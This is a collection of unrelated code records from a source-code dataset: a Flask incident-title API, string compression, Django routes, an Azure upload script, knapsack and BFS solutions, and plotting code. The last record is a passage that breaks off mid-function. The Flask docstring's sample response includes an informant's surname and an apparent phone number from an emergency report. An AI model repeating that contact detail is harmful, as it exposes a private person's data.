@apiSuccessExample {json} Success-Response:\n {\n \"tittle\": \"a la altura del colegio teniente hugo ortiz -diagonagl al parque de los samanes alertante indica camioneta esta en la via rapida, informante sr. lalama 0999163219\",\n \"keywords\": [\n \"via\",\n \"av\",\n \"camioneta\",\n \"altura\",\n \"ref\"\n ]\n }\n @apiError (701) {json} illegalParams invalid input parameters; see the returned JSON for details.\n \"\"\"\n bolmodel = BolTitleExtraction(system='bol')\n\n def post(self):\n form = ParametersValidator(request.form)\n if not form.validate():\n app.logger.warn('Tittle|Illegal Parameters: {}'.format(\n json.dumps(form.errors)\n ))\n return form.errors, 701\n desc = form.desc.data.lower()\n title, keywords = self.bolmodel.extract(desc, form.id.data)\n return {'tittle': title, 'keywords': keywords}\n\n\nclass ParametersValidator(Form):\n id = IntegerField(\n 'id',\n [validators.DataRequired(message='no subtype id.')],\n )\n desc = StringField(\n 'desc',\n [validators.DataRequired(message='no description')])\n","sub_path":"incident/IncidentTitleExtraction.py","file_name":"IncidentTitleExtraction.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"91847817","text":"class CompressString(object):\n\n def compress(self, string):\n # Run-length encodes the string (e.g. 'aaabb' -> 'a3b2'); returns the\n # original string when the compressed form would not be shorter.\n if string is None or string == \"\":\n return string\n tem = []\n print(string)\n i = 0\n # Insert a space between each run of identical characters.\n while i < len(string)-1:\n tem.append(string[i])\n print(tem)\n if string[i] != string[i+1]:\n tem.append(\" \")\n i = i + 1\n tem.append(string[-1])\n st = \"\".join(tem).split()\n s = \"\"\n # Emit 'char + count' for runs longer than one, the bare char otherwise.\n for j in st:\n if len(j) > 1:\n s = s + j[0]\n s = s + str(len(j))\n else:\n s = s + j\n if len(s) == len(string):\n return string\n else:\n return s\n\n\n\n","sub_path":"python100/compress_str.py","file_name":"compress_str.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
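# A quick worked example for the CompressString record above (illustrative; not
# part of the original file). 'aabcccccaaa' compresses to 'a2bc5a3', while 'abc'
# is returned unchanged because 'a1b1c1' would be no shorter:
#
#     cs = CompressString()
#     assert cs.compress('aabcccccaaa') == 'a2bc5a3'
#     assert cs.compress('abc') == 'abc'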
{"seq_id":"498230978","text":"from django.conf.urls import url\nfrom django.urls import path\n\nfrom . import views\n\napp_name = 'groups'\n\nurlpatterns = [\n path('academic_groups/<int:pk>', views.AcademicGroupDetailView.as_view(), name='academicgroup_detail'),\n path('students/new', views.StudentCreateView.as_view(), name='student_create'),\n path('students/<int:pk>/delete', views.StudentDeleteView.as_view(), name='student_delete'),\n path('students/<int:pk>', views.StudentDetailView.as_view(), name='student_detail'),\n path('exams/', views.AcademicGroupExamListView.as_view(), name='exam_list'),\n path('exams/new', views.AcademicGroupExamCreateView.as_view(), name='exam_create'),\n path('exams/<int:pk>/delete', views.AcademicGroupExamDeleteView.as_view(), name='exam_delete'),\n url(r'^student/(?P<pk>[0-9]+)/edit_student_exams/$', views.edit_student_exams, name='edit_student_exams'),\n url(r'^events/$', views.events, name='events'),\n url(r'^add_event/$', views.add_event, name='add_event'),\n url(r'^event/add_student/$', views.event_add_student, name='event_add_student'),\n url(r'^edit_event_group/$', views.edit_event_group, name='edit_event_group'),\n url(r'^delete_event_group/$', views.delete_event_group, name='delete_event_group'),\n url(r'^jury/$', views.jury, name='jury'),\n]\n","sub_path":"academic_groups/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"521383575","text":"import os\nimport requests\nimport mmap\nimport gzip\nimport csv\nimport json\nimport sys\nimport subprocess\nimport platform\nimport re\n\nfrom azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient\nfrom dotenv import load_dotenv\nfrom urllib.parse import urlparse\nfrom datetime import datetime\n\n\n# Input the filecontents here\nfilecontent = \"https://data.govt.lc/sites/default/files/Estimated%20fish%20landings.csv\"\n\n# Auxiliary functions\ndef executeCProgram(CprogramFileName, systemType):\n command = []\n if 'Linux' in systemType:\n subprocess.call([\"gcc\", CprogramFileName, '-o', 'Cprogram']) # For Compiling\n command = ['./Cprogram']\n elif 'Windows' in systemType:\n subprocess.call([\"gcc\", CprogramFileName])\n subprocess.call('a.exe')\n command = ['./Cprogram']\n elif 'Darwin' in systemType:\n subprocess.call([\"gcc\", CprogramFileName])\n command = ['./a.out']\n p = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n p.communicate(input='dataToReadFile.txt\\n'.encode())[0]\n\n\ndef writeInputForParser(WODFileName, CSVFileName):\n dataToReadFile = open(\"dataToReadFile.txt\", \"w\")\n dataToReadFile.write(WODFileName + \"\\n\")\n dataToReadFile.write(\"0\\nA\\n\")\n dataToReadFile.write(CSVFileName + \"\\n1\\n\")\n dataToReadFile.close()\n\ndef ungz(filename):\n fname = filename.replace(\".gz\", \"\")\n gfile = gzip.GzipFile(filename)\n open(fname, \"wb+\").write(gfile.read())\n gfile.close()\n \ndef tidyname(filename):\n pattern = '[A-Za-z][A-Za-z0-9]'\n tidy_name = \"\".join(re.findall(pattern, os.path.splitext(filename)[0]))\n \n if len(tidy_name) > 63:\n tidy_name = tidy_name[:63]\n elif len(tidy_name) < 3:\n tidy_name = tidy_name + datetime.now().strftime(\"%H%M%S\")\n \n return tidy_name\n\ndef get_credentials():\n load_dotenv()\n return os.getenv('AZURE_CONNECTION_STRING'), os.getenv(\"AZURE_CONTAINER_NAME\")\n\ndef uploadToBlob():\n connection_string, container_name = get_credentials()\n blob_service_client = BlobServiceClient.from_connection_string(connection_string)\n containerclient = 
blob_service_client.get_container_client(container_name)\n\n url = urlparse(filecontent)\n u = requests.get(filecontent, stream=True)\n filename = os.path.basename(url.path)\n pre, ext = os.path.splitext(filename)\n updated_filename = tidyname(pre) + \".json\"\n \n # This checks whether the blob already exists\n blob = BlobClient.from_connection_string(conn_str=connection_string, container_name=container_name, blob_name=updated_filename)\n if blob.exists():\n blob.delete_blob(delete_snapshots=False)\n \n # If a gz file is downloaded, unzip it and decode it into a csv file\n if ext == \".gz\":\n with open(filename, 'wb') as f:\n f.write(u.content)\n ungz(filename)\n CprogramFileName = \"wodtodepthmatrix.c\"\n WODFileName = pre\n filename = WODFileName + \".csv\"\n # Creates the csv file named as filename\n writeInputForParser(WODFileName, filename)\n executeCProgram(CprogramFileName, platform.system())\n # Remove the unzipped file and downloaded gz file\n os.remove(os.path.abspath(WODFileName + \".gz\"))\n\n # If a csv file is downloaded, creates a csv file\n if ext == \".csv\":\n with open(filename, \"wb\") as f:\n f.write(u.content)\n\n # Converts the csv file into a Json file\n with open(filename, \"r+b\") as f:\n mm = mmap.mmap(f.fileno(), 0) \n mm.seek(0)\n ls = []\n for i in range(mm.size()):\n byte = mm.readline()\n line = byte.decode('utf-8', 'ignore')\n line = line.strip()\n line = line.split(',')\n line = list(filter(lambda a: a != '', line))\n if len(line) == 0:\n continue\n ls.append(line)\n \n for i in range(1, len(ls)):\n ls[i] = dict(zip(ls[0], ls[i]))\n in_json = json.dumps(ls[1:], indent=4)\n \n # Connects to the client and uploads the data to the Blob\n blob_client = containerclient.get_blob_client(updated_filename)\n blob_client.upload_blob(in_json, metadata=None)\n # Removes the csv file created\n os.remove(os.path.abspath(filename))\n if os.path.exists(pre):\n os.remove(os.path.abspath(pre))\n f.close()\n mm.close()\n return in_json\n\ndef getBlobFromAzure():\n connection_string, container_name = get_credentials()\n \n url = urlparse(filecontent)\n filename = os.path.basename(url.path)\n pre, ext = os.path.splitext(filename)\n updated_filename = tidyname(pre) + \".json\"\n \n blob = BlobClient.from_connection_string(conn_str=connection_string, container_name=container_name, blob_name=updated_filename)\n blob_data = blob.download_blob().readall()\n json_file_content = blob_data.decode('utf8').replace(\"'\",'\"')\n jlist = json.loads(json_file_content)\n \n return jlist \n \nif __name__ == '__main__':\n uploaded_json = json.loads(uploadToBlob())\n downloaded_json = getBlobFromAzure()\n print(uploaded_json == downloaded_json)\n ","sub_path":"COMP0016_2020_21_Team12-datasetsExperimentsAna/Main/tests/TestUrlToAzureStorage.py","file_name":"TestUrlToAzureStorage.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
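# The record above converts each CSV row to a dict keyed by the header row. A
# hedged, minimal equivalent using csv.DictReader (illustrative sketch only;
# 'data.csv' is a placeholder name, and the original's mmap-based parsing also
# drops empty fields, which this sketch does not):
#
#     import csv, json
#     with open('data.csv', newline='') as f:
#         rows = [dict(r) for r in csv.DictReader(f)]
#     payload = json.dumps(rows, indent=4)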
{"seq_id":"414855759","text":"# Uses python3\nimport sys\n\n# input is capacity(int) and list of weights with position same as list of values\ndef get_optimal_value(capacity, weights, values):\n # init list of value per KG\n ValuePerKg = [v / w for v,w in zip(values,weights) ]\n # sort desc weights and values according to ValuePerKg list\n weights_sorted = [x for _,x in sorted(zip(ValuePerKg,weights), reverse=True)]\n # values_sorted = [x for _,x in sorted(zip(ValuePerKg,values), reverse=True)]\n ValuePerKg_sorted = sorted(ValuePerKg,reverse=True)\n # after already sorted (most value/kg is leftmost), we take the leftmost item first\n n = len(weights)\n # initialize total value in bag\n value = 0\n for i in range(n):\n if capacity == 0:\n return(value)\n a = min(capacity,weights_sorted[i])\n value += a * (ValuePerKg_sorted[i])\n weights_sorted[i] -= a\n capacity -= a \n return value\n\n\nprint(get_optimal_value(50,[20,50,30],[60,100,120]))\n# print(get_optimal_value(10,[30],[500]))\n\n\n# if __name__ == \"__main__\":\n# data = list(map(int, sys.stdin.read().split()))\n# n, capacity = data[0:2]\n# values = data[2:(2 * n + 2):2]\n# weights = data[3:(2 * n + 2):2]\n# opt_value = get_optimal_value(capacity, weights, values)\n# print(\"{:.10f}\".format(opt_value))\n\n\n# Pseudo code\n\n# def Knapsack(W,w1,v1,...,w_n,v_n): # where W is capacity\n\n# # amount is place in knapsack\n# amount = [0] * (len(n))\n# totalValue = 0\n# repeat n times:\n# # W = 0 means the knapsack is full, so return the total value\n# if W =0:\n# return (totalValue, amounts)\n# # set i = index of largest value/ kg\n# i = BestItem(W,w1,v1,...,w_n,v_n)\n# # compute how much to take of this item\n# # compare item weight (w_i) and space left in knapsack (W). If the item weight is smaller, the item fits entirely, so we take all of it\n# # if the space in the knapsack is smaller, we take just enough of this item to fill the knapsack\n# a = min (w_i,W)\n# totalValue = totalValue + a *(vi/wi)\n# # update the remaining quantity by subtracting a, so we know how much of this item is already in the knapsack\n# wi = wi - a\n# # update place in knapsack of the amount we took in\n# # add to the existing amount because part of this item may already have been taken\n# amount[i] = amount[i] + a\n# # decrease the capacity\n# W = W-a\n# return (totalValue, amount)\n\n \n\n# copy from internet. this better version sorts only one time\ndef get_optimal_value(capacity, weights, values):\n value = 0.\n proportion = [float(v) / float(w) for v, w in zip(values, weights)]\n for _ in range(len(weights) + 1):\n if capacity == 0:\n return value\n max_weight = max(proportion)\n index = proportion.index(max_weight)\n proportion[index] = -1\n add_capacity = min(capacity, weights[index])\n value += add_capacity * max_weight\n weights[index] -= add_capacity\n capacity -= add_capacity\n return value","sub_path":"01AlgorithmicDesignandTechniques/week3_greedy_algorithms_starters/2_maximum_value_of_the_loot/fractional_knapsack.py","file_name":"fractional_knapsack.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
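# A quick sanity check of the greedy rule in the record above (illustrative):
# for capacity 50, weights [20, 50, 30], values [60, 100, 120], the value/kg
# ratios are 3, 2 and 4, so the greedy takes all 30 kg at ratio 4 (120), then
# all 20 kg at ratio 3 (60), filling the sack for a total of 180:
#
#     assert get_optimal_value(50, [20, 50, 30], [60, 100, 120]) == 180.0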
{"seq_id":"92472707","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colorbar import Colorbar\nfrom matplotlib import gridspec\n\n# define grid parameters\nX = np.load('X.npy')\nYh = np.load('Yh.npy')\nZ = np.load('Z.npy')\nYv = np.load('Yv.npy')\nkx = np.load('kx.npy')\nky = np.load('ky.npy')\nky2 = np.load('ky2.npy')\n\n# define plot parameters\ncmap = plt.get_cmap('viridis')\ncmap2 = plt.get_cmap('inferno')\nticksize = 14\nfsize = 16\n\n# Load spectra files\nnkx, nky = kx.shape\nek_xy_nl = np.load('ek_xy_nl.npy')\nek_xy_gql2 = np.load('ek_xy_gql2.npy')\nek_xy_gql3 = np.load('ek_xy_gql3.npy')\nek_xy_gql8 = np.load('ek_xy_gql8.npy')\nek_xy_ql = np.load('ek_xy_ql.npy')\nu_xy_NW_nl = np.load('u_xy_NW_nl.npy')\nu_xy_NW_gql2 = np.load('u_xy_NW_gql2.npy')\nu_xy_NW_gql3 = np.load('u_xy_NW_gql3.npy')\nu_xy_NW_gql8 = np.load('u_xy_NW_gql8.npy')\nu_xy_NW_ql = np.load('u_xy_NW_ql.npy')\n\n# Find index of max energy spectra\nind_ek_ql = np.unravel_index(np.argmax(ek_xy_ql, axis=None), ek_xy_ql.shape)\nind_ek_gql2 = np.unravel_index(np.argmax(ek_xy_gql2, axis=None), ek_xy_gql2.shape)\nind_ek_gql3 = np.unravel_index(np.argmax(ek_xy_gql3, axis=None), ek_xy_gql3.shape)\nind_ek_gql8 = np.unravel_index(np.argmax(ek_xy_gql8, axis=None), ek_xy_gql8.shape)\nind_ek_dns = np.unravel_index(np.argmax(ek_xy_nl, axis=None), ek_xy_nl.shape)\n\ndef nw_Ekxy(nx, ny):\n ld = nx / 2\n # Define max/mins for shared colorbar\n combined_u_xy_NW = np.array([u_xy_NW_ql, u_xy_NW_gql3, u_xy_NW_nl])\n u_xy_NW_min, u_xy_NW_max = np.amin(combined_u_xy_NW), np.amax(combined_u_xy_NW)\n combined_ek_xy = np.array([ek_xy_ql, ek_xy_gql3, ek_xy_nl]) # leave QL out of this for now (or forever)\n ek_xy_min, ek_xy_max = np.amin(combined_ek_xy), np.amax(combined_ek_xy)\n\n fig = plt.figure(7, figsize=(15, 8))\n gs = gridspec.GridSpec(2, 5, width_ratios=[1, 1, 1, 1, 0.05], height_ratios=[1, 1])\n gs.update(left=0.05, right=0.95, bottom=0.09, top=0.9, wspace=0.2, hspace=0.2)\n # set axes (2 rows, 5 columns per row... [ql, colorbar, extra row for spacing, gql, dns, sharedcolorbar]\n ax00 = fig.add_subplot(gs[0, 0])\n ax01 = fig.add_subplot(gs[0, 1], sharey=ax00)\n ax02 = fig.add_subplot(gs[0, 2], sharey=ax00)\n ax03 = fig.add_subplot(gs[0, 3], sharey=ax00)\n ax10 = fig.add_subplot(gs[1, 0])\n ax11 = fig.add_subplot(gs[1, 1], sharey=ax10)\n ax12 = fig.add_subplot(gs[1, 2], sharey=ax10)\n ax13 = fig.add_subplot(gs[1, 3], sharey=ax10)\n # Define plots\n plt00 = ax00.contourf(X, Yh, np.flipud(u_xy_NW_ql), vmax=u_xy_NW_max, vmin=u_xy_NW_min,cmap=cmap) # name to create mappable for colorbar\n plt01 = ax01.contourf(X, Yh, np.flipud(u_xy_NW_gql3), vmax=u_xy_NW_max, vmin=u_xy_NW_min, cmap=cmap)\n plt02 = ax02.contourf(X, Yh, np.flipud(u_xy_NW_gql8), vmax=u_xy_NW_max, vmin=u_xy_NW_min, cmap=cmap)\n plt03 = ax03.contourf(X, Yh, np.flipud(u_xy_NW_nl), vmax=u_xy_NW_max, vmin=u_xy_NW_min,cmap=cmap) # set vmax/vmin to normalize cbar\n plt10 = ax10.contourf(kx[1:11, 1:int(ny/5)], ky2[1:11, 1:int(ny/5)], ek_xy_ql[0:10, 0:15], vmax=ek_xy_max, vmin=ek_xy_min, cmap=cmap2) # name to create mappable for colorbar\n plt11 = ax11.contourf(kx[1:11, 1:int(ny/5)], ky2[1:11, 1:int(ny/5)], ek_xy_gql3[0:10, 0:15], vmax=ek_xy_max, vmin=ek_xy_min, cmap=cmap2) # name to create mappable for colorbar\n plt12 = ax12.contourf(kx[1:11, 1:int(ny/5)], ky2[1:11, 1:int(ny/5)], ek_xy_gql8[0:10, 0:15], vmax=ek_xy_max, vmin=ek_xy_min, cmap=cmap2)\n plt13 = ax13.contourf(kx[1:11, 1:int(ny/5)], ky2[1:11, 1:int(ny/5)], ek_xy_nl[0:10, 0:15], vmax=ek_xy_max, vmin=ek_xy_min,cmap=cmap2)\n # Labels\n # fig.suptitle('2D Horizontal (x-y) Energy Spectrum, Near Wall', size=18)\n ax00.set_title('$\\Lambda_x$ = 0 (QL)', size=14)\n ax00.set_ylabel('y', size=fsize, rotation=0)\n ax00.tick_params(axis='both', which='major', labelsize=ticksize)\n ax00.set_xlabel('x', size=fsize)\n ax01.set_title('$\\Lambda_x$ = 3 (GQL)', size=fsize)\n ax01.set_xlabel('x', size=fsize)\n ax01.tick_params(axis='both', which='major', labelsize=ticksize)\n ax02.set_title('$\\Lambda_x$ = 8 (GQL)', size=fsize)\n ax02.set_xlabel('x', size=fsize)\n ax02.tick_params(axis='both', which='major', labelsize=ticksize)\n ax03.set_title('$\\Lambda_x$ = %i (NL)' % ld, size=fsize)\n ax03.set_xlabel('x', size=fsize)\n ax03.tick_params(axis='both', which='major', labelsize=ticksize)\n ax10.set_ylabel('$k_y$', size=fsize, rotation=0)\n ax10.set_xlabel('$k_x$', size=fsize)\n ax10.tick_params(axis='both', which='major', labelsize=ticksize)\n ax10.set_yscale('log')\n ax10.set_xscale('log')\n 
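# (Aside, not in the original file: the per-panel boilerplate that follows
# repeats largely the same calls; under the assumption that every spectra
# panel shares this formatting, it could be applied in a loop.)
#
#     for ax in (ax11, ax12, ax13):
#         ax.set_xlabel('$k_x$', size=fsize)
#         ax.tick_params(axis='both', which='major', labelsize=ticksize)
#         ax.set_xscale('log')
#         ax.set_yscale('log')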
ax11.set_xlabel('$k_x$', size=fsize)\n ax11.tick_params(axis='both', which='major', labelsize=ticksize)\n ax11.set_yscale('log')\n ax11.set_xscale('log')\n ax12.set_xlabel('$k_x$', size=fsize)\n ax12.tick_params(axis='both', which='major', labelsize=ticksize)\n ax12.set_xscale('log')\n ax12.set_yscale('log')\n ax13.set_xlabel('$k_x$', size=fsize)\n ax13.tick_params(axis='both', which='major', labelsize=ticksize)\n ax13.xaxis.set_minor_locator(plt.MaxNLocator(0))\n ax13.set_xscale('log')\n ax13.set_yscale('log')\n # Set colorbars\n cbax04 = plt.subplot(gs[0, 4])\n cbax14 = plt.subplot(gs[1, 4])\n cb04 = Colorbar(ax=cbax04, mappable=plt01, orientation='vertical', ticklocation='right')\n cb14 = Colorbar(ax=cbax14, mappable=plt10, orientation='vertical', ticklocation='right')\n cb04.ax.set_yticklabels(cb04.ax.get_yticklabels(), fontsize=ticksize)\n cb04.ax.yaxis.set_major_locator(plt.MaxNLocator(5))\n cb14.ax.set_yticklabels(cb14.ax.get_yticklabels(), fontsize=ticksize)\n # cb13.ax.yaxis.set_major_locator(plt.MaxNLocator(5))\n # Housekeeping\n plt.setp(ax01.get_yticklabels(), visible=False) # Turn off ticks for y axes\n plt.setp(ax02.get_yticklabels(), visible=False)\n plt.setp(ax11.get_yticklabels(), visible=False)\n plt.setp(ax12.get_yticklabels(), visible=False)\n # plt.setp(ax75.get_yticklabels(), visible=False)\n # plt.setp(ax76.get_yticklabels(), visible=False)\n fig.savefig('xyspectra_nwcompare_zm.png')\n return fig.show()\n\ndef maxmode_kx(nx):\n ld = nx / 2\n\n# Spectra maximum by wavenumber kx\n fig, ax = plt.subplots()\n plt.plot(kx[1:nkx, 0], ek_xy_ql[:, ind_ek_ql[1]], 'blue', label='$\\Lambda_x$ = 0 (QL)')\n plt.plot(kx[1:nkx, 0], ek_xy_gql2[:, ind_ek_gql2[1]], 'orange', label='$\\Lambda_x$ = 2 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_gql3[:, ind_ek_gql3[1]], 'g', label='$\\Lambda_x$ = 3 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_gql8[:, ind_ek_gql8[1]], 'r', label='$\\Lambda_x$ = 8 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_nl[:, ind_ek_dns[1]], 'purple', label='$\\Lambda_x$ = %i (NL)' % ld)\n # ##plt.clabel(contour4, inline=True, fontsize=8)\n # ax.set_title('2D Horizontal (x-y) Energy Spectrum, DNS')\n ax.set_xlabel('$k_x$', fontsize=fsize)\n ax.set_xscale('log')\n ax.set_ylabel('$E_{xy}$', fontsize=fsize)\n ax.set_yscale('log')\n legend = ax.legend(loc='best', shadow=True)\n ax.tick_params(axis='both', which='major', labelsize=ticksize)\n ax.yaxis.set_minor_locator(plt.MaxNLocator(3))\n fig.savefig('maxmode_kx.png')\n return plt.show()\n\ndef maxmode_kx_zoom(nx):\n ld = nx / 2\n\n# Spectra maximum by wavenumber kx\n fig, ax = plt.subplots()\n plt.plot(kx[1:5, 0], ek_xy_ql[0:4, ind_ek_ql[1]], 'blue', label='$\\Lambda_x$ = 0 (QL)')\n plt.plot(kx[1:5, 0], ek_xy_gql2[0:4, ind_ek_gql2[1]], 'orange', label='$\\Lambda_x$ = 2 (GQL)')\n plt.plot(kx[1:5, 0], ek_xy_gql3[0:4, ind_ek_gql3[1]], 'g', label='$\\Lambda_x$ = 3 (GQL)')\n plt.plot(kx[1:5, 0], ek_xy_gql8[0:4, ind_ek_gql8[1]], 'r', label='$\\Lambda_x$ = 8 (GQL)')\n plt.plot(kx[1:5, 0], ek_xy_nl[0:4, ind_ek_dns[1]], 'purple', label='$\\Lambda_x$ = %i (NL)' % ld)\n # ##plt.clabel(contour4, inline=True, fontsize=8)\n # ax.set_title('2D Horizontal (x-y) Energy Spectrum, zoomed in, DNS')\n ax.set_xlabel('$k_x$', fontsize=fsize)\n ax.set_xscale('log')\n ax.set_ylabel('$E_{xy}$', fontsize=fsize)\n ax.set_yscale('log')\n legend = ax.legend(loc='best', shadow=True)\n ax.tick_params(axis='both', which='major', labelsize=ticksize)\n ax.yaxis.set_minor_locator(plt.MaxNLocator(3))\n fig.savefig('maxmode_kx_zoom.png')\n return plt.show()\n\ndef 
maxmode_kx_noql(nx):\n ld = nx / 2\n\n# Spectra maximum by wavenumber kx\n fig, ax = plt.subplots()\n plt.plot(kx[1:nkx, 0], ek_xy_gql2[:, ind_ek_gql2[1]], 'orange', label='$\\Lambda_x$ = 2 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_gql3[:, ind_ek_gql3[1]], 'g', label='$\\Lambda_x$ = 3 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_gql8[:, ind_ek_gql8[1]], 'r', label='$\\Lambda_x$ = 8 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_nl[:, ind_ek_dns[1]], 'purple', label='$\\Lambda_x$ = %i (NL)' % ld)\n # ##plt.clabel(contour4, inline=True, fontsize=8)\n # ax.set_title('2D Horizontal (x-y) Energy Spectrum, DNS')\n ax.set_xlabel('$k_x$', fontsize=fsize)\n ax.set_xscale('log')\n ax.set_ylabel('$E_{xy}$', fontsize=fsize)\n ax.set_yscale('log')\n legend = ax.legend(loc='best', shadow=True)\n ax.tick_params(axis='both', which='major', labelsize=ticksize)\n ax.yaxis.set_minor_locator(plt.MaxNLocator(3))\n fig.savefig('maxmode_kx_noql.png')\n return plt.show()\n\ndef maxmode_ky(nx):\n# Spectra maximum by wavenumber ky\n ld = nx / 2\n fig, ax = plt.subplots()\n plt.plot(ky[0, 1:nkx], ek_xy_ql[ind_ek_ql[0], :], 'blue', label='$\\Lambda_x$ = 0 (QL)')\n plt.plot(ky[0, 1:nkx], ek_xy_gql2[ind_ek_gql2[0], :], 'orange', label='$\\Lambda_x$ = 2 (GQL)')\n plt.plot(ky[0, 1:nkx], ek_xy_gql3[ind_ek_gql3[0], :], 'g', label='$\\Lambda_x$ = 3 (GQL)')\n plt.plot(ky[0, 1:nkx], ek_xy_gql8[ind_ek_gql8[0], :], 'r', label='$\\Lambda_x$ = 8 (GQL)')\n plt.plot(ky[0, 1:nkx], ek_xy_nl[ind_ek_dns[0], :], 'purple', label='$\\Lambda_x$ = %i (NL)' % ld)\n # ##plt.clabel(contour4, inline=True, fontsize=8)\n # ax.set_title('2D Horizontal (x-y) Energy Spectrum, DNS')\n ax.set_xlabel('$k_y$', fontsize=fsize)\n ax.set_xscale('log')\n ax.set_ylabel('$E_{xy}$', fontsize=fsize)\n ax.set_yscale('log')\n ax.tick_params(axis='both', which='major', labelsize=ticksize)\n ax.yaxis.set_minor_locator(plt.MaxNLocator(3))\n # ax.yaxis.set_minor_locator(plt.MaxNLocator(5))\n legend = ax.legend(loc='best', shadow=True)\n fig.savefig('Ek_ky.png')\n return plt.show()\n","sub_path":"spectra.py","file_name":"spectra.py","file_ext":"py","file_size_in_byte":10305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"283440858","text":"from sentence_transformers import SentenceTransformer\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nmodel = SentenceTransformer('roberta-base-nli-stsb-mean-tokens')\n\n\ndef embed(input):\n return model.encode(input)\n\n\ndef get_scores(input_query, input_corpus, topk=5):\n emb_corpus = np.array(model.encode(input_corpus))\n emb_query = np.array(model.encode([input_query]))\n results = cosine_similarity(emb_query, emb_corpus)[0]\n topk = results.argsort()[-topk:][::-1]\n scores = results[topk]\n sentences = [input_corpus[idx] for idx in topk]\n return [str(s) for s in scores], sentences\n\n\n# %%\n# lines = []\n# with open('dataset.txt') as f:\n# lines = f.readlines()\n# query_text = 'time sharing operational system'\n\n# s, sen = get_scores(query_text, lines)\n","sub_path":"sentenceROBERTA_model.py","file_name":"sentenceROBERTA_model.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
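# A hedged usage sketch for the sentence-similarity record above (illustrative;
# the corpus lines are invented):
#
#     corpus = ["an operating system schedules processes",
#               "bread is made from flour"]
#     scores, hits = get_scores("time sharing operational system", corpus, topk=1)
#     # hits[0] should be the OS sentence; scores are cosine similarities as strings.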
{"seq_id":"13014227","text":"# 21:00 start\n# 21:55 finish\n\nfrom sys import stdin\ninput = stdin.readline\nfrom collections import deque\n\n# squares the elephant (Sang) can move to\ndr = (-3, -2, 2, 3, 3, 2, -2, -3)\ndc = (2, 3, 3, 2, -2, -3, -3, -2)\n\n# blocking squares for each move direction\nobstacle = {0: ((-1, 0), (-2, 1)),\n 1: ((0, 1), (-1, 2)),\n 2: ((0, 1), (1, 2)),\n 3: ((1, 0), (2, 1)),\n 4: ((1, 0), (2, -1)),\n 5: ((0, -1), (1, -2)),\n 6: ((0, -1), (-1, -2)),\n 7: ((-1, 0), (-2, -1))}\n\ndef bfs():\n board = [[0] * 9 for _ in range(10)]\n board[sr][sc] = 1\n Q = deque([(sr, sc)])\n while Q:\n r, c = Q.popleft() \n for d in range(8):\n nr = r + dr[d]\n nc = c + dc[d]\n # skip if it leaves the board or was already visited\n if not (0 <= nr < 10 and 0 <= nc < 9) or board[nr][nc]:\n continue\n\n # if the king blocks a square along this move\n flag = True\n for wr, wc in obstacle[d]:\n if (r+wr, c+wc) == (kr, kc):\n flag = False # mark this direction as blocked\n break\n if not flag:\n continue\n\n if (nr, nc) == (kr, kc): # reached the king: done\n return board[r][c]\n\n # normal move\n board[nr][nc] = board[r][c] + 1\n Q.append((nr, nc))\n \n return -1 # the king is unreachable\n\n# main\nsr, sc = map(int, input().split()) # elephant (Sang) position\nkr, kc = map(int, input().split()) # king position\nprint(bfs())","sub_path":"daily_study/ProblemSolving/16509_장군.py","file_name":"16509_장군.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
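# The next record builds an employment-multiplier matrix from input-output
# tables via the Leontief inverse. A minimal NumPy sketch of that core step
# (all values invented for illustration):
#
#     import numpy as np
#     A = np.array([[0.1, 0.2], [0.3, 0.1]])   # technical coefficients
#     e = np.array([0.5, 0.8])                 # employment per unit of output
#     L = np.linalg.inv(np.eye(2) - A)         # Leontief inverse
#     lmult = e @ L                            # employment multipliers per product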
{"seq_id":"30868601","text":"#\n# EMPLOYMENT MULTIPLIER MATRIX : LMULT\n# input : naio_cp18i_r2.tsv (dom)\n# : nama_nace64_e.tsv\n#\nimport sys\nimport glob\nfrom numpy import *\nfrom numpy.linalg import inv\n#import DBAccess\nimport\tFileAccessMatrix\n\ndirWork = sys.argv[1]\ndirUse = dirWork \ndirTXT\t\t\t= dirUse\t\t\t+'\\\\Input\\\\txt'\ndirInput = dirUse +'\\\\Input\\\\tsv\\\\nace2'\ndirOutput = dirUse +'\\\\Output\\\\matrix'\ndirLog = dirUse +'\\\\Log'\n\nfichierCSV = dirInput + '\\\\naio_cp18i_r2.tsv'\nfichierEMP = dirInput + '\\\\nama_nace64_e.tsv'\nfileLog = open(dirLog + '\\\\matrixILmult.log', 'w')\nfileOutput = open(dirOutput + '\\\\matrixIDBLmult.csv', 'w')\n\n# global variables received as parameters; the input file name: spi_tree_indicator_(country,rev1,rev2,sector).csv\n# fichier = input file to process\n\n# function that avoids misalignments:\n# we look for what exists in the P1 vector but not in the matrix vector,\n# and in that case add the P1 product codes with 0 values\n# \ndef vectorAtraiter(vectorMatrice, vectorP1):\n vectorOutput = []\n lstProdP1 = []\n lstProdMat = [] \n for c in (range(0,len(vectorP1))):\n productLst = vectorP1[c].split('#')\n productP1 = productLst[0]\n lstProdP1 = lstProdP1 + [productP1]\n #lstProdMat = [] \n for p in (range(0,len(vectorMatrice))): \n pLst = 